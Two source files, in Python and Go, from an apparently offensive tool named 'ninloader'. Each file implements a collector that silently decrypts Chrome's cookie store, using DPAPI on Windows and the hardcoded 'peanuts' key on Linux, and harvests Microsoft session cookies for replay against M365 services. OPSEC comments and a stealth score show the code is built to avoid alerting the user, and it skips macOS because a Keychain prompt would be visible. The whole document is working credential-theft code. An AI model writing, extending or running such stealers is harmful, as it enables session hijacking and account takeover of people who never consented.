File: ninloader/ninloader/collectors/microsoft/browser_cookies.py
"""Microsoft browser cookie collector — extracts session cookies via Chromium decrypt.

Extracts Microsoft session cookies from Chrome's encrypted Cookies database.
Targets .microsoft.com, .microsoftonline.com, and .live.com domains.
These cookies can provide access to M365 services when replayed.

OPSEC:
  - Windows/Linux: SILENT (DPAPI / hardcoded 'peanuts' key)
  - macOS: SKIPPED by default (Keychain prompt is user-visible)
"""

from __future__ import annotations

from typing import List

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import chrome_user_data_dir, get_platform


_MS_HOST_PATTERNS = [".microsoft.com", ".microsoftonline.com", ".live.com"]


@CollectorRegistry.register
class MicrosoftBrowserCookiesCollector(BaseCollector):
    service = "microsoft"
    source = "browser_cookies"
    stealth_score = 5
    requires = ["cryptography"]
    platforms = ["windows", "linux"]  # Skip macOS — Keychain prompt

    def discover(self) -> List[DiscoveredToken]:
        """Check if Chrome Cookies DB exists with Microsoft cookies."""
        results = []
        chrome_dir = chrome_user_data_dir()

        profiles = ["Default"] + [f"Profile {i}" for i in range(1, 10)]
        for profile in profiles:
            cookies_db = chrome_dir / profile / "Cookies"
            if not cookies_db.exists():
                cookies_db = chrome_dir / profile / "Network" / "Cookies"

            if cookies_db.exists():
                results.append(DiscoveredToken(
                    service=self.service,
                    source=self.source,
                    path=str(cookies_db),
                    account_hint=f"chrome:{profile}",
                    stealth_score=self.stealth_score,
                    details=(
                        "Microsoft session cookies "
                        f"({', '.join(_MS_HOST_PATTERNS)}); "
                        f"platform={get_platform()}"
                    ),
                ))

        return results

    def collect(self) -> List[CollectedToken]:
        """Extract and decrypt Microsoft session cookies from Chrome."""
        missing = self.check_dependencies()
        if missing:
            self._warn(
                f"Missing dependencies: {', '.join(missing)}. "
                f"Install with: pip install {' '.join(missing)}"
            )
            return []

        from ...core.chromium_decrypt import extract_cookies, get_chrome_key, DecryptError

        try:
            key = get_chrome_key(allow_prompt=False)
        except DecryptError as e:
            self._warn(f"Cannot get Chrome key: {e}")
            return []

        results = []
        profiles = ["Default"] + [f"Profile {i}" for i in range(1, 10)]

        for profile in profiles:
            try:
                cookies = extract_cookies(
                    profile=profile,
                    host_patterns=_MS_HOST_PATTERNS,
                    key=key,
                )
            except DecryptError as e:
                self._warn(f"Failed to extract cookies from {profile}: {e}")
                continue
            except Exception as e:
                self._warn(f"Unexpected error extracting from {profile}: {e}")
                continue

            if not cookies:
                continue

            # Group cookies by domain for organized output
            by_domain: dict = {}
            for c in cookies:
                host = c["host"]
                if host not in by_domain:
                    by_domain[host] = {}
                by_domain[host][c["name"]] = c

            # Build cookie jar dict for the extra field
            cookie_jar = {}
            for host, host_cookies in by_domain.items():
                for name, c in host_cookies.items():
                    cookie_jar[f"{host}:{name}"] = {
                        "value": c["value"],
                        "host": c["host"],
                        "path": c["path"],
                        "secure": c["secure"],
                        "httponly": c["httponly"],
                    }

            # Use the first available cookie value as the primary access_token
            # (for the CollectedToken format — full cookie jar is in extra)
            first_cookie = cookies[0]

            results.append(CollectedToken(
                service=self.service,
                source=self.source,
                stealth_score=self.stealth_score,
                access_token=secure(first_cookie["value"]),
                extra={
                    "profile": profile,
                    "cookies": cookie_jar,
                    "cookie_count": len(cookies),
                    "domains": list(by_domain.keys()),
                    "platform": get_platform(),
                },
            ))

            self._info(
                f"Extracted {len(cookies)} Microsoft cookies from "
                f"chrome:{profile} across {len(by_domain)} domains"
            )

        return results

File: ninloader/go/collectors/microsoft/browser_cookies.go
//go:build !darwin

// Microsoft browser cookie collector — extracts session cookies via Chromium decrypt.
//
// Extracts Microsoft session cookies from Chrome's encrypted Cookies database.
// Targets .microsoft.com, .microsoftonline.com, and .live.com domains.
// These cookies can provide access to M365 services when replayed.
//
// Cross-platform support:
//   - macOS:   SKIPPED (build tag excludes — Keychain prompt is user-visible)
//   - Windows: DPAPI via CryptUnprotectData (silent)
//   - Linux:   PBKDF2 with 'peanuts' hardcoded key
//
// OPSEC:
//   - Windows/Linux: SILENT (DPAPI / hardcoded 'peanuts' key)
//   - macOS: SKIPPED by default (Keychain prompt is user-visible)
package microsoft

import (
	"fmt"

	"github.com/ninken/ninloader-go/internal/chromium"
	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
)

var msHostPatterns = []string{".microsoft.com", ".microsoftonline.com", ".live.com"}

func init() {
	registry.Register("microsoft", "browser_cookies", func() collector.Collector {
		return &BrowserCookiesCollector{
			BaseCollector: collector.BaseCollector{Svc: "microsoft", Src: "browser_cookies", Plats: []string{"linux", "windows"}},
		}
	})
}

// BrowserCookiesCollector extracts Microsoft session cookies from Chrome's
// encrypted Cookies database via the chromium package.
type BrowserCookiesCollector struct {
	collector.BaseCollector
}

func (c *BrowserCookiesCollector) Service() string    { return c.Svc }
func (c *BrowserCookiesCollector) Source() string      { return c.Src }
func (c *BrowserCookiesCollector) StealthScore() int   { return 5 }
func (c *BrowserCookiesCollector) Platforms() []string { return c.Plats }

// msProfiles returns the list of Chrome profile directory names to scan.
func msProfiles() []string {
	p := []string{"Default"}
	for i := 1; i <= 9; i++ {
		p = append(p, fmt.Sprintf("Profile %d", i))
	}
	return p
}

func (c *BrowserCookiesCollector) Discover() []*types.DiscoveredToken {
	var results []*types.DiscoveredToken
	chromeDir := platform.ChromeUserDataDir()

	for _, profile := range msProfiles() {
		cookies, err := chromium.ExtractCookies(chromeDir, profile, msHostPatterns, nil)
		if err != nil || len(cookies) == 0 {
			continue
		}

		results = append(results, &types.DiscoveredToken{
			Service:      c.Svc,
			Source:       c.Src,
			Path:         fmt.Sprintf("%s/%s/Cookies", chromeDir, profile),
			AccountHint:  fmt.Sprintf("chrome:%s", profile),
			StealthScore: c.StealthScore(),
			Details: fmt.Sprintf(
				"Microsoft session cookies (%s); platform=%s",
				joinHostPatterns(msHostPatterns),
				platform.Platform(),
			),
		})
	}

	return results
}

func (c *BrowserCookiesCollector) Collect() []*types.CollectedToken {
	chromeDir := platform.ChromeUserDataDir()

	var results []*types.CollectedToken

	for _, profile := range msProfiles() {
		cookies, err := chromium.ExtractCookies(chromeDir, profile, msHostPatterns, nil)
		if err != nil {
			c.Warn(fmt.Sprintf("Failed to extract cookies from %s: %v", profile, err))
			continue
		}

		if len(cookies) == 0 {
			continue
		}

		// Group cookies by domain for organized output.
		byDomain := make(map[string]map[string]chromium.Cookie)
		for _, ck := range cookies {
			if byDomain[ck.Host] == nil {
				byDomain[ck.Host] = make(map[string]chromium.Cookie)
			}
			byDomain[ck.Host][ck.Name] = ck
		}

		// Build cookie jar dict for the extra field.
		cookieJar := make(map[string]any)
		for host, hostCookies := range byDomain {
			for name, ck := range hostCookies {
				key := fmt.Sprintf("%s:%s", host, name)
				cookieJar[key] = map[string]any{
					"value":    ck.Value,
					"host":     ck.Host,
					"path":     ck.Path,
					"secure":   ck.Secure,
					"httponly":  ck.HTTPOnly,
				}
			}
		}

		// Use the first available cookie value as the primary access_token.
		firstCookie := cookies[0]

		// Collect domain names.
		domains := make([]string, 0, len(byDomain))
		for d := range byDomain {
			domains = append(domains, d)
		}

		tok := types.NewCollectedToken(c.Svc, c.Src, c.StealthScore())
		tok.AccessToken = types.Secure(firstCookie.Value)
		tok.Extra["profile"] = profile
		tok.Extra["cookies"] = cookieJar
		tok.Extra["cookie_count"] = len(cookies)
		tok.Extra["domains"] = domains
		tok.Extra["platform"] = platform.Platform()

		results = append(results, tok)

		c.Info(fmt.Sprintf(
			"Extracted %d Microsoft cookies from chrome:%s across %d domains",
			len(cookies), profile, len(byDomain),
		))
	}

	return results
}

func joinHostPatterns(patterns []string) string {
	result := ""
	for i, p := range patterns {
		if i > 0 {
			result += ", "
		}
		result += p
	}
	return result
}
